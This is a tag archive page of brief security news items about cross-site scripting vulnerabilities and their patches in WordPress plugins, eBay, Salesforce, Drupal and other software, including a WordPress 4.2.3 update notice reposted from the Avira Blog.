Developers at Automattic fixed a stored cross-site scripting error this week in Akismet, the anti-spam plugin that figures into millions of WordPress websites.
Tag Archives: XSS
WordPress Jetpack Plugin Patched Against Stored XSS Vulnerability
The popular Jetpack WordPress plugin was updated this week in order to patch a critical stored cross-site scripting vulnerability.
New Attacks Recall Old Problems with Browser Cookies
DHS CERT published an alert prompted by a paper delivered at USENIX regarding the security of browser cookies.
eBay Fixes XSS Flaw in Subdomain
There was a cross-site scripting vulnerability in an eBay domain that could have allowed an attacker to steal users’ session cookies and take over their accounts. The company has removed the vulnerable page, according to the researcher who discovered the bug and disclosed it to eBay, Aditya Sood. The vulnerability existed on an eBay subdomain, […]
Netflix Sleepy Puppy Awakens XSS Vulnerabilities in Secondary Applications
Netflix released Sleepy Puppy, a cross-site scripting payload management framework, to open source. The tool finds XSS vulnerabilities in secondary applications.
Salesforce Patches XSS on a Subdomain
Salesforce.com patched a cross-site scripting vulnerability on one of its domains that could have led to phishing attacks.
Vulnerabilities Identified in Several WordPress Plugins
Researchers have identified a handful of vulnerabilities present in three different plugins used by the content management system WordPress.
PHP File Manager Riddled With Vulnerabilities, Including Backdoor
Multiple critical vulnerabilities have existed, some for nearly five years, in PHP File Manager, a web-based file manager used by several high profile corporations.
XSS Vulnerability In WordPress – Update Now
The guys from WordPress just released version 4.2.3 of their software, which is mostly a security update. They “strongly encourage you to update your sites immediately.“ To do so just visit your Dashboard, click on ‘Updates’ and then on ‘Update Now’. As mentioned above you’ll only have to update manually if, for whatever reason, you decided to disable the automatic updates.
According to their blog entry the newest version contains fixes for 20 bugs from 4.2. The page also says: “WordPress versions 4.2.2 and earlier are affected by a cross-site scripting vulnerability, which could allow users with the Contributor or Author role to compromise a site. This was initially reported by Jon Cave and fixed by Robert Chapin, both of the WordPress security team, and later reported by Jouko Pynnönen.
We also fixed an issue where it was possible for a user with Subscriber permissions to create a draft through Quick Draft. Reported by Netanel Rubin from Check Point Software Technologies.“
And don’t forget: Since WordPress is definitely one of the most popular Content Management Systems and blogging platforms out there it remains an attractive target for cybercriminals – especially due to the huge user base. Administrators should always keep their WordPress installations (including addons and themes) updated and patch as soon as there are security updates available.
If you want to find out more about the dangers you could face as a blog administrator and get some advice which might help you to protect your page, take a look at Ange Albertini’s blog article concerning the topic.
The post XSS Vulnerability In WordPress – Update Now appeared first on Avira Blog.
Several Critical Flaws Patched in Drupal Module
There are several critical vulnerabilities in a middleware layer used in Drupal, including both cross-site scripting and cross-site request forgery bugs, that can be exploited remotely. The vulnerabilities are in the Open Semantic Framework, which is a third-party project and not part of the Drupal Core. The framework is used to allow “structured data (RDF) […]